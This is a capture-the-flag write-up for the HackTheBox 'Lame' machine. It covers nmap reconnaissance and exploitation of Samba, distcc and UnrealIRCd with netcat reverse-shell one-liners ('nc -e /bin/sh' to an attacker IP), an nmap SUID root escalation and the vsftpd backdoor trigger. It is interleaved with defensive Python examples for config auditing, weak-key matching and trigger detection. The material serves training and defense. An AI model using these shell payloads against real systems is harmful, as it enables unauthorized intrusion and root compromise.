# Lame

#### Recon

```bash
nmap -p21,22,139,445,3632 -sV -sC -T4 -Pn -oA 10.10.10.3-nmap 10.10.10.3
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-30 05:49 +08
Nmap scan report for beep.htb (10.10.10.3)
Host is up (0.017s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.43
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)
|_  2048 5656240f211ddea72bae61b1243de8f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2024-01-29T16:50:20-05:00
|_clock-skew: mean: 2h30m54s, deviation: 3h32m20s, median: 45s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.35 seconds

```

The three interesting services:

* 21/tcp open ftp vsftpd 2.3.4
* 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
* 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

All three versions look old.
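The service-and-version triage above is done by eye; as an added example (not part of the original writeup), here is a small parser for nmap's normal output that pulls the port, state, service and version text out of each port line and extracts the first dotted version number, returning None where nmap could only guess a range like `Samba smbd 3.X - 4.X`. The sample scan text is the port section of the scan above, embedded so the script runs offline.

```python
import re

# Constructed sample: the port lines of the scan above, in nmap's normal output format.
# NSE script output lines (starting with '|') are interleaved, as in a real scan.
SAMPLE_SCAN = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
"""

# One port line: "<port>/<proto>  <state>  <service>  [<version text>]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)
# First dotted numeric token: "2.3.4" from "vsftpd 2.3.4", "3.0.20" from "Samba smbd 3.0.20-Debian"
VERSION_NUMBER = re.compile(r"\d+(?:\.\d+)+")


def parse_ports(scan_text):
    """Return one dict per port line; the header and NSE script lines are skipped."""
    records = []
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["port"] = int(rec["port"])
        rec["version"] = (rec["version"] or "").strip()
        records.append(rec)
    return records


def version_number(version_text):
    """First dotted version number in nmap's free-text version column, or None when
    nmap only reports a range such as 'Samba smbd 3.X - 4.X'."""
    m = VERSION_NUMBER.search(version_text)
    return m.group(0) if m else None


def open_services(scan_text):
    """(port, service, version text, version number) for every open port with a version."""
    return [
        (r["port"], r["service"], r["version"], version_number(r["version"]))
        for r in parse_ports(scan_text)
        if r["state"] == "open" and r["version"]
    ]


if __name__ == "__main__":
    for port, service, text, number in open_services(SAMPLE_SCAN):
        print(f"{port:>5}  {service:<12} {number or '?':<8} {text}")
```

Feeding the `.nmap` file written by `-oA` to `open_services` gives the same triage list as the bullets above, with the bare version number separated out so it can be compared against a patch baseline.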

#### ftp

```bash
searchsploit vsftpd 2.3.4
--------------------------------------------------- ---------------------------------
 Exploit Title                                     |  Path
--------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution          | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metaspl | unix/remote/17491.rb
--------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
```

**Manual ftp exploit (not working):**

```bash
nc 10.10.10.3 21
220 (vsFTPd 2.3.4)
USER 0xdf:)
331 Please specify the password.
PASS 0xdf-not-a-password

nc 10.10.10.3 6200
```

**ftp backdoor trigger**

```bash
USER anyname-end-with-smile:) 
```

#### samba

```bash
searchsploit samba 3.0.20
--------------------------------------------------- ---------------------------------
 Exploit Title                                     |  Path
--------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security By | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script'  | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow              | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)      | linux_x86/dos/36741.py
--------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
```

**Manual samba exploit (working):**

```bash
smbclient  //lame.htb/tmp
Password for [WORKGROUP\kali]:
Anonymous login successful
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.14.43 443`"
Password: 
session setup failed: NT_STATUS_IO_TIMEOUT
smb: \> 

sudo nc -nvlp 443
```

**Smb vulnerable code**

```ruby
  def exploit
    connect

    # lol?
    username = "/=`nohup " + payload.encoded + "`"
    begin
      simple.client.negotiate(false)
      simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false)
    rescue ::Timeout::Error, XCEPT::LoginError
      # nothing, it either worked or it didn't ;)
    end

    handler
  end
```
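The Metasploit module works because the `username map script` setting makes Samba hand the login name to a shell, so the backticks in the username are evaluated. As an added example that is not part of the writeup or of Samba, the script below shows the same bug in miniature: the unsafe function pastes the username into a command line that `sh -c` parses, the safe one passes it as a single argv element with no shell, and a character allow-list rejects it outright. `echo` stands in for the map script and the injected payload is a harmless `echo INJECTED`, so the difference shows up as output. The smb.conf fragment and the script path in it are constructed.

```python
import re
import subprocess

# Stand-in for the external program that smb.conf's 'username map script' names.
# 'echo' keeps the demonstration harmless and makes the result checkable.
MAP_SCRIPT = "echo"

# Constructed username of the shape used against Samba above, with a harmless
# 'echo INJECTED' inside the backticks instead of a reverse shell.
SAMPLE_USERNAME = "/=`echo INJECTED`"


def map_username_unsafe(username):
    """Vulnerable pattern: the username is pasted into a command line that a shell
    parses, so backticks, ';' and '|' inside it become part of the command."""
    command_line = f"{MAP_SCRIPT} {username}"
    result = subprocess.run(["sh", "-c", command_line], capture_output=True, text=True)
    return result.stdout.strip()


def map_username_safe(username):
    """Hardened pattern: argv list and no shell; the username reaches the program as
    one literal argument whatever characters it contains."""
    result = subprocess.run([MAP_SCRIPT, username], capture_output=True, text=True)
    return result.stdout.strip()


# Second layer: accept only characters a real account name can contain.
USERNAME_RE = re.compile(r"[A-Za-z0-9._@-]{1,64}")


def is_valid_username(username):
    return USERNAME_RE.fullmatch(username) is not None


def validated_username(username):
    if not is_valid_username(username):
        raise ValueError(f"rejected username with unexpected characters: {username!r}")
    return username


# Config-side check: list every 'username map script' directive in an smb.conf text,
# since that directive is what turns a login name into shell input.
MAP_SCRIPT_DIRECTIVE = re.compile(r"^\s*username\s+map\s+script\s*=\s*(?P<script>.+?)\s*$", re.I)


def smbconf_map_scripts(smbconf_text):
    """(line number, script path) for each 'username map script' line."""
    hits = []
    for n, line in enumerate(smbconf_text.splitlines(), 1):
        m = MAP_SCRIPT_DIRECTIVE.match(line)
        if m:
            hits.append((n, m.group("script")))
    return hits


# Constructed smb.conf fragment; the script path is made up.
SAMPLE_SMBCONF = """\
[global]
   workgroup = WORKGROUP
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
   guest ok = yes
"""

if __name__ == "__main__":
    print("unsafe :", map_username_unsafe(SAMPLE_USERNAME))   # the backticks ran
    print("safe   :", map_username_safe(SAMPLE_USERNAME))     # printed literally
    print("config :", smbconf_map_scripts(SAMPLE_SMBCONF))
```

The unsafe call prints `/=INJECTED` because the shell substituted the backtick command; the safe call prints the username unchanged. On a real server the fix is the same two steps: never route the login name through a shell, and validate it before any external program sees it.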

#### distccd

```bash
searchsploit distcc
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                            |  Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
DistCC Daemon - Command Execution (Metasploit)                                                                                            | multiple/remote/9915.rb
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
```

CVE-2004-2687: distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.
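The CVE text and the nmap script both describe this as a configuration weakness: the daemon is only a problem when it accepts jobs from anyone. As an added example that is not part of the writeup or of distcc, the checker below audits the access restriction in a `/etc/default/distcc` style file. The `STARTDISTCC`, `ALLOWEDNETS` and `LISTENER` keys and the `KEY="value"` layout are assumed to follow the Debian/Ubuntu packaging; both configuration texts are constructed, and the "broader than a /16" threshold is a local policy choice, not a distcc rule.

```python
import ipaddress
import re

# Constructed /etc/default/distcc contents. The KEY="value" layout with STARTDISTCC,
# ALLOWEDNETS and LISTENER is assumed (Debian/Ubuntu style). The weak version lets any
# host submit compile jobs; the fixed version allows loopback and one build LAN only.
WEAK_CONF = """\
# Defaults for distcc (constructed sample)
STARTDISTCC="true"
ALLOWEDNETS="0.0.0.0/0"
LISTENER="0.0.0.0"
NICE="10"
"""

FIXED_CONF = """\
STARTDISTCC="true"
ALLOWEDNETS="127.0.0.1 192.168.10.0/24"
LISTENER="192.168.10.5"
NICE="10"
"""

KEY_VALUE = re.compile(r'^([A-Z_]+)\s*=\s*"?([^"#]*)"?')


def parse_defaults(text):
    """Parse KEY="value" lines into a dict, ignoring blank and comment lines."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_VALUE.match(line)
        if m:
            conf[m.group(1)] = m.group(2).strip()
    return conf


def audit_distcc(text, max_prefix_span=16):
    """Return a list of findings; an empty list means the restriction looks sane.
    max_prefix_span is a local policy: any allowed network broader than /16 is flagged."""
    conf = parse_defaults(text)
    findings = []
    if conf.get("STARTDISTCC", "false").lower() != "true":
        return findings  # daemon is not started at boot, so nothing is exposed
    for token in conf.get("ALLOWEDNETS", "").split():
        try:
            net = ipaddress.ip_network(token, strict=False)
        except ValueError:
            findings.append(f"ALLOWEDNETS entry {token!r} is not a valid network")
            continue
        if net.prefixlen == 0:
            findings.append(f"ALLOWEDNETS {net} accepts jobs from every source address")
        elif not (net.is_private or net.is_loopback):
            findings.append(f"ALLOWEDNETS {net} is a public range")
        elif net.prefixlen < max_prefix_span:
            findings.append(f"ALLOWEDNETS {net} is broader than a /{max_prefix_span}")
    listener = conf.get("LISTENER", "")
    if listener in ("", "0.0.0.0", "::"):
        findings.append("LISTENER binds every interface; bind the build LAN address instead")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("fixed", FIXED_CONF)):
        print(name, audit_distcc(conf) or "OK")
```

The weak file produces two findings (the wide-open `ALLOWEDNETS` and the all-interfaces listener); the fixed file produces none. The same check can be run against the live command line, since the packaging turns `ALLOWEDNETS` into distccd's `--allow` arguments.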

```bash
wget https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse -O /usr/share/nmap/scripts/distcc-exec.nse
```

**RCE (as the unprivileged daemon user)**

```bash
nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='id'" -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-31 04:52 +08
Nmap scan report for lame.htb (10.10.10.3)
Host is up (0.042s latency).

PORT     STATE SERVICE
3632/tcp open  distccd
| distcc-exec: 
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|       
|     Disclosure date: 2002-02-01
|     Extra information:
|       
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
```

**Matching the ssh public key against the known-weak Debian key set**

```bash
git clone https://github.com/g0tmi1k/debian-ssh

cd debian-ssh
cd common_keys

# extract the 2048-bit RSA key set
tar jxf debian_ssh_rsa_2048_x86.tar.bz2

cd rsa/2048

# grep recursively for the public key; the matching .pub file names the private key
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== *.pub
```
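The grep above matches the raw base64 blob, which breaks as soon as a key line has a different comment, options prefix or whitespace. As an added example that is not part of the writeup or of the debian-ssh repository, the script below does the same lookup by SHA256 fingerprint (the `SHA256:` form `ssh-keygen -l` prints), so a defender can index a known-weak collection once and check every `authorized_keys` file against it. The key blobs and file labels are constructed (base64 of arbitrary bytes standing in for real wire-format keys); the matching only depends on the bytes.

```python
import base64
import hashlib

KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")


def parse_pubkey_line(line):
    """Return (key type, base64 blob) from a .pub or authorized_keys line, or None for
    blank/comment lines. authorized_keys lines may start with options such as from=...,
    so the key type token is located rather than assumed to be first."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split()
    for i, token in enumerate(parts[:-1]):
        if token in KEY_TYPES:
            return token, parts[i + 1]
    return None


def fingerprint(blob_b64):
    """SHA256 fingerprint as ssh-keygen -l prints it: 'SHA256:' + base64 without padding."""
    raw = base64.b64decode(blob_b64 + "=" * (-len(blob_b64) % 4))
    digest = hashlib.sha256(raw).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def build_index(weak_keys):
    """Map fingerprint -> label for an iterable of (label, public key line)."""
    index = {}
    for label, line in weak_keys:
        parsed = parse_pubkey_line(line)
        if parsed:
            index[fingerprint(parsed[1])] = label
    return index


def find_weak_keys(authorized_keys_text, index):
    """(line number, fingerprint, label) for every authorized key present in the index."""
    hits = []
    for n, line in enumerate(authorized_keys_text.splitlines(), 1):
        parsed = parse_pubkey_line(line)
        if not parsed:
            continue
        fp = fingerprint(parsed[1])
        if fp in index:
            hits.append((n, fp, index[fp]))
    return hits


def _blob(data):
    # Stand-in for a real key blob: base64 of arbitrary bytes (constructed).
    return base64.b64encode(data).decode()


# Constructed known-weak collection with made-up file labels.
WEAK_SET = [
    ("rsa/2048/weak-0001.pub", "ssh-rsa " + _blob(b"constructed-weak-key-0001") + " root@weak"),
    ("rsa/2048/weak-0002.pub", "ssh-rsa " + _blob(b"constructed-weak-key-0002") + " root@weak"),
]

# Constructed authorized_keys: one unrelated key, one weak key behind an options prefix.
AUTHORIZED_KEYS = "\n".join([
    "# keys for user (constructed sample)",
    "ssh-rsa " + _blob(b"constructed-good-key") + " user@host",
    'from="10.0.0.0/8" ssh-rsa ' + _blob(b"constructed-weak-key-0002") + " root@host",
])

if __name__ == "__main__":
    for n, fp, label in find_weak_keys(AUTHORIZED_KEYS, build_index(WEAK_SET)):
        print(f"line {n}: {fp} matches {label}")
```

Run against the real collection, `WEAK_SET` would be built by walking the extracted `*.pub` files; the fingerprints of a server's `authorized_keys` and host keys can then be compared without ever handling the private halves.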

**suid**

```bash
find / -type f -user root \( -perm -4000 -o -perm -2000 \) 2>/dev/null -ls

344956  768 -rwsr-xr-x   1 root     root       780676 Apr  8  2008 /usr/bin/nmap

sh-3.2$ /usr/bin/nmap --interactive

Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
whoami
root
```

**local services**

```bash
netstat -tnlp
netstat -ano
netstat -anp
```

**UnrealIRCd exploit**

```bash
ps aux
root      5622  0.0  0.4   8540  2364 ?        S    06:01   0:08 /usr/bin/unrealircd

sh-3.2$ nc 127.0.0.1 6697
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
```

**Exploit code**

```bash
echo "AB; nc -e /bin/sh 10.10.14.43 6767" | nc 127.0.0.1 6697
```

**Listener**

```bash
nc -nvlp 6767
listening on [any] 6767 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.10.3] 39012
whoami
root
```
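Both backdoors on this box (the vsftpd one triggered by a `:)` in the FTP username above, and the UnrealIRCd one triggered by a line starting with `AB;`) are recognisable from a single client-to-server line, which makes them easy to alert on. As an added example that is not part of the writeup, the detector below runs two per-service signature rules over constructed client command lines of the kind a capture decoder or protocol-aware proxy log would present. The vsftpd rule matches the two characters anywhere in the USER argument, a superset of the end-of-name form shown above; the IRC rule is anchored to the start of the line, so the same text inside a PRIVMSG body does not fire.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    service: str          # which protocol's command lines the rule applies to
    pattern: re.Pattern   # matched against one client -> server line


RULES = (
    # vsftpd 2.3.4 backdoor: ':)' within the USER argument (the writeup's example puts
    # it at the end of the name); the service then opens a shell on port 6200.
    Rule("vsftpd-2.3.4-backdoor-trigger", "ftp", re.compile(r"^USER\s+\S*:\)\S*\s*$", re.I)),
    # UnrealIRCd backdoor: a line that begins with 'AB;' is run as a system command.
    Rule("unrealircd-backdoor-trigger", "irc", re.compile(r"^AB;")),
)


def detect(events, rules=RULES):
    """events: iterable of (service, client, line). Returns one alert per matching rule,
    applying each rule only to lines of its own service."""
    alerts = []
    for service, client, line in events:
        for rule in rules:
            if rule.service == service and rule.pattern.search(line):
                alerts.append({"rule": rule.name, "client": client, "line": line})
    return alerts


# Constructed client -> server lines, as a capture decoder might present them.
SAMPLE_EVENTS = [
    ("ftp", "10.10.14.43", "USER anonymous"),
    ("ftp", "10.10.14.43", "PASS guest"),
    ("ftp", "10.10.14.43", "USER 0xdf:)"),
    ("ftp", "10.10.14.43", "PASS 0xdf-not-a-password"),
    ("irc", "127.0.0.1", "NICK tester"),
    ("irc", "127.0.0.1", "PRIVMSG #ops :AB; inside a message body is not the trigger"),
    ("irc", "127.0.0.1", "AB; id"),
    ("ftp", "10.10.14.43", "AB; id"),   # wrong service: the irc rule must not fire here
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert['rule']:<32} {alert['client']:<14} {alert['line']}")
```

Two alerts come out of the sample: the smiley login from 10.10.14.43 and the `AB;` line on the local IRC port. For the vsftpd case a follow-up connection to port 6200 from the same client, as in the manual attempt above, is the confirming second signal.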

#### Lessons learnt

* Remember to check for SUID binaries
* Enumerate all services and their versions
* Check for unusual processes running as root
* Check for sensitive readable files (including SSH keys)
* A leaked public SSH key can be looked up against known private keys
